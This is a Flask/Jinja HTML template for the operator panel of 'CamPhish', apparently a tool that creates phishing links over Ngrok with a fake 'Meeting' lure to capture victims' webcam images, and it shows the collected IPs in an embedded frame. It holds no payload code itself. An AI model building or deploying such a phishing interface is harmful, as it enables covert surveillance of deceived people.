{% extends 'base.html' %}

{% block head %}
    <link rel="stylesheet" href="{{ url_for('static', filename='css/Camphish.css') }}">
    <title>CamPhish</title>
{% endblock %}



{% block body %}
    <div id="content">
        <form action="/CamPhish" method="post">
            <hr>
            <label for="port_forwarding">Service for port forwarding</label>
            <br>
            <select name="port_forwarding" id="port_forwarding">
                <option value="1" id="ngrok">Ngrok</option>
                <option value="2" id="serveo" disabled>Serveo.net | Not yet implemented</option>
            </select>
            <hr>

            <label for="template" id="templatelabel">Select your Template</label><br>
            <select name="template" id="template">
                <option value="1" id="festival" disabled>Festival | Not yet implemented</option>
                <option value="2" id="youtube" disabled>Youtube | Not yet implemented</option>
                <option value="3" id="meeting">Meeting</option>
            </select>
            <hr>
            <input type="submit" value="Create Link" id="submit">
        </form>
    {% if ngrok_url != None%}
        <p>Your Camphish Url: <a href="{{ ngrok_url }}"> {{ ngrok_url }}</a></p>
    {% endif %}
    </div>

    <iframe id="ips" src="/ips" style="border: none; width: available">
    </iframe>
{% endblock %}

